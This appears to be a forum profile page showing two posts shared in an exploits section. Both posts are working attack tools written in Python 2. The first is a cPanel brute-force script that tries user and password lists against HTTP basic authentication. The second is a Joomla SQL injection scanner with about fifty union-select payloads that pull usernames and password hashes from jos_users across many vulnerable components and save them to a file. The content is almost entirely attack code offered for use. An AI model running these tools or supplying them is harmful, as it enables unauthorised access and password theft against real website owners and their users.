Jump to content

MAVNE

Members
 View Profile  See their activity

  • Posts

    6

  • Joined

  • Last visited

 Content Type 

Posts posted by MAVNE

  1. cPanel Brute Forcer

    in Exploituri

    Posted

    #!usr/bin/python

    #cPanel BruteForcer

    #http://www.darkc0de.com

    #d3hydr8[at]gmail[dot]com

    import threading, time, random, sys, urllib2, httplib, base64

    from copy import copy

    def title():

    print "\n\t d3hydr8[at]gmail[dot]com cPanel BruteForcer v1.0"

    print "\t-----------------------------------------------------\n"

    def timer():

    now = time.localtime(time.time())

    return time.asctime(now)

    if len(sys.argv) !=5:

    title()

    print "\nUsage: ./cPanelbrute.py <server> <port> <userlist> <wordlist>\n"

    print "ex: python cPanelbrute.py example.com 2082 users.txt wordlist.txt\n"

    sys.exit(1)

    try:

    users = open(sys.argv[3], "r").readlines()

    except(IOError):

    print "Error: Check your userlist path\n"

    sys.exit(1)

    try:

    words = open(sys.argv[4], "r").readlines()

    except(IOError):

    print "Error: Check your wordlist path\n"

    sys.exit(1)

    wordlist = copy(words)

    def reloader():

    for word in wordlist:

    words.append(word)

    def getword():

    lock = threading.Lock()

    lock.acquire()

    if len(words) != 0:

    value = random.sample(words, 1)

    words.remove(value[0])

    else:

    print "\nReloading Wordlist - Changing User\n"

    reloader()

    value = random.sample(words, 1)

    users.remove(users[0])

    lock.release()

    if len(users) ==1:

    return users[0], value[0][:-1]

    else:

    return users[0][:-1], value[0][:-1]

    def getauth(url):

    req = urllib2.Request(url)

    try:

    handle = urllib2.urlopen(req)

    except IOError, e:

    pass

    else:

    print "This page isn't protected by basic authentication.\n"

    sys.exit(1)

    if not hasattr(e, 'code') or e.code != 401:

    print "\nThis page isn't protected by basic authentication."

    print 'But we failed for another reason.\n'

    sys.exit(1)

    authline = e.headers.get('www-authenticate', '')

    if not authline:

    print '\nA 401 error without a basic authentication response header - very weird.\n'

    sys.exit(1)

    else:

    return authline

    class Worker(threading.Thread):

    def run(self):

    username, password = getword()

    try:

    print "-"*12

    print "User:",username,"Password:",password

    auth_handler = urllib2.HTTPBasicAuthHandler()

    auth_handler.add_password("cPanel", server, base64encodestring(username)[:-1], base64encodestring(password)[:-1])

    opener = urllib2.build_opener(auth_handler)

    urllib2.install_opener(opener)

    urllib2.urlopen(server)

    print "\t\n\nUsername:",username,"Password:",password,"----- Login successful!!!\n\n"

    except (urllib2.HTTPError, httplib.BadStatusLine), msg:

    #print "An error occurred:", msg

    pass

    title()

    if sys.argv[1][-1] == "/":

    sys.argv[1] = sys.argv[1][:-1]

    server = sys.argv[1]+":2082"

    if sys.argv[2].isdigit() == False:

    print "[-] Port must be a number\n"

    sys.exit(1)

    else:

    port = sys.argv[2]

    if sys.argv[1][-1] == "/":

    sys.argv[1] = sys.argv[1][:-1]

    server = sys.argv[1]+":"+port

    print "[+] Server:",server

    print "[+] Port:",port

    print "[+] Users Loaded:",len(users)

    print "[+] Words Loaded:",len(words)

    print "[+]",getauth(server)

    print "[+] Started",timer(),"\n"

    for i in range(len(words)*len(users)):

    work = Worker()

    work.setDaemon(1)

    work.start()

    time.sleep(1)

    print "\n[-] Done -",timer(),"\n"

  2. Joomla Sql Injection Scanner v 1.1

    in Exploituri

    Posted

    import sys,os, re, urllib2, socket

    print "\t\n Joomla Sql Injection Scanner v 1.1 \n"

    print "\t beenudel1986[at]gmail[dot]com"

    if len(sys.argv) != 2:

    print "\nUsage: ./joomsq.py <joomla site>"

    print "Ex: ./joomsq.py www.test.com/\n"

    sys.exit(1)

    paths = ["index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=61&cat_id=-9999999/**/union/**/select/**/000,111,222,username,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2/**/from/**/jos_users/*",

    "index.php?option=com_clasifier&Itemid=61&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",

    "index.php?option=com_simpleshop&Itemid=41&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*",

    "index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",

    "administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),concat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*",

    "index.php?option=com_galeria&Itemid=61&func=detail&id=-999999/**/union/**/select/**/0,0,password,111,222,333,0,0,0,0,0,1,1,1,1,1,1,444,555,666,username/**/from/**/users/*",

    "index.php?option=com_jooget&Itemid=61&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*",

    "index.php?option=com_quiz&task=user_tst_shw&Itemid=61&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/jos_users/*",

    "index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=2&task=view&iid=-3333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2Cconcat(username,0x3a,password)%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users",

    "index.php?option=com_xfaq&task=answer&Itemid=42&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*",

    "index.php?option=com_pcchess&Itemid=61&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",

    "index.php?option=com_neogallery&task=show&Itemid=5&catid=999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from%2F%2A%2A%2Fjos_users",

    "index.php?option=com_noticias&Itemid=xcorpitx&task=detalhe&id=-99887766/**/union/**/%20select/**/0,concat(username,0x3a,password,0x3a,email),2,3,4,5/**/%20from/**/%20jos_users/*",

    "index.php?option=com_doc&task=view&sid=-1/**/union/**/select/**/concat(username,0x3a,password),1,2,concat(username,0x3a,password),0x3a,5,6,7,8,password,username,11/**/from/**/jos_users/",

    "index.php?option=com_marketplace&page=show_category&catid=-1+union+select+concat(username,0x3a,password),2,3+from+jos_users/*",

    "index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*",

    "index.php?option=com_neoreferences&Itemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*",

    "index.php?option=com_puarcade&Itemid=92&fid=-1%20union%20select%20concat(username,0x3a,password)%20from%20jos_users--",

    "index.php?option=com_ynews&Itemid=0&task=showYNews&id=-1/**/union/**/select/**/0,1,2,username,password,5,6%20from%20jos_users/*",

    "index.php?option=com_xfaq&task=answer&Itemid=27&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*",

    "index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users--",

    "index.php?option=com_mcquiz&task=user_tst_shw&Itemid=42&tid=1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),0x3a/**/from/**/jos_users/*",

    "index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=S@BUN&task=view&iid=-3333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2Cconcat(username,0x3a,password)%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users",

    "index.php?option=com_eventlist&func=details&did=9999999999999%20union%20select%200,0,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),4,5,6,7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20from%20jos_users/*",

    "index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),777,666,555,444,333,222,111%20from%20jos_users/*",

    "index.php?option=com_neorecruit&task=offer_view&id=option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*",

    "index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*",

    "index.php?option=com_garyscookbook&Itemid=21&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fjos_users/*",

    "index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=%20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,0,0%20from%20jos_users/*",

    "index.php?option=com_rwcards&task=listCards&category_id=-1'union%20select%201,2,03,4,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),50,044,076,0678,07%20from%20jos_users/*",

    "index.php?option=com_hello_world&Itemid=27&task=show&type=intro&id=-9999999/**/union/**/select/**/0x3a,username,password,0x3a/**/from/**/jos_users/*",

    "index.php?option=com_product&Itemid=12&task=viewlist&catid=-9999999/**/union/**/select/**/username,1,2,3,password,5,6,7,8,9/**/from/**/jos_users/*",

    "index.php?option=com_cms&act=viewitems&cat_id=-9999999/**/union/**/select/**/111,111,concat(username,0x3a,password),222,222,333,333/**/from/**/jos_users/*",

    "index.php?option=com_most&mode=email&secid=-9999999/**/union/**/select/**/0000,concat(username,0x3a,password),2222,3333/**/from/**/jos_users/*",

    "index.php?option=com_idvnews&id=-1/**/union/**/select/**/0,concat(username,0x3a,password),2222,concat(username,0x3a,password),0,0,0,0/**/from/**/jos_users/*",

    "index.php?option=com_joomlavvz&Itemid=34&func=detail&id=-9999999+union/**/select+0x3a,0x3a,password,0,0,0,0,0,0,0,0,0x3a,0x3a,0x3a,0x3a,username/**/from/**/jos_users/*",

    "index.php?option=com_referenzen&Itemid=7&detail=-9999999+union/**/select/**/0x3a,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,concat(username,0x3a,password),0,0,0,0,0/**/from/**/jos_users/*",

    "index.php?option=com_genealogy&task=profile&id=-9999999/**/union/**/select/**/0,0x3a,2,0x3a,0x3a,5,0x3a,0x3a,8,concat(username,0x3a,password)/**/from/**/jos_users/*",

    "index.php?option=com_listoffreeads&AdId=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*",

    "index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",

    "index.php?option=com_geoboerse&page=view&catid=-1/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",

    "index.php?option=com_ricette&Itemid=S@BUN&func=detail&id=-9999999/**/union/**/select/**/0,0,%20%20%200x3a,111,222,333,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,concat(username,0x3a,password)/**/from/**/jos_users/*",

    "index.php?option=com_team&gid=-1/**/union/**/select/**/1,2,3,password,5,6,7,8,9,10,username,12,13/**/from/**/jos_users/*",

    "index.php?option=com_formtool&task=view&formid=2&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",

    "index.php?option=com_jooget&Itemid=S@BUN&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*",

    "index.php?option=com_profile&Itemid=42&task=&task=viewoffer&oid=9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",

    "index.php?option=com_sg&Itemid=16&task=order&range=3&category=3&pid=-9999999/**/union/**/select/**/0,1,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,10,11,0x3a,0x3a,14,15,16/**/from/**/jos_users/*",

    "index.php?option=faq&task=viewallfaq&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password),0x3a,0/**/from/**/jos_users/*",

    "index.php?option=com_omnirealestate&Itemid=0&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/jos_users/*&results=joomla",

    "index.php?option=com_model&Itemid=0&task=pipa&act=2&objid=-9999/**/union/**/select/**/username,password/**/from/**/jos_users/*",

    "index.php?option=com_mezun&task=edit&hidemainmenu=joomla&id=-9999999/**/union/**/select/**/concat(username,0x3a,password),username,password,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a/**/from/**/jos_users/*",

    "index.php?option=com_resman&task=moreinfo&id=-1%20union%20select%20111,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),333%20from%20jos_users/*"]

    socket.setdefaulttimeout(10)

    host = sys.argv[1]

    print "[+] JoomlaPath:",host

    print "[+] Vuln. Loaded:",len(paths)

    if host[:7] != "http://":

    host = "http://"+host

    if host[-1:] != "/":

    host = host+"/"

    print "[+] Testing..."

    for path in paths:

    try:

    #print host+path

    source = urllib2.urlopen(host+path, "80").read()

    md5s = re.findall("[a-f0-9]"*32,source)

    if len(md5s) >=1:

    print "\nHost:",host+path

    print "Found:"

    for md5 in md5s:

    print "\t-",md5

    file=open ('hash.txt' , 'a')

    file.write( '\n' + md5)

    except(urllib2.URLError, socket.timeout, socket.gaierror, socket.error):

    pass

    except(KeyboardInterrupt):

    pass

    print "\n[-] Done\n"

×
×
  • Create New...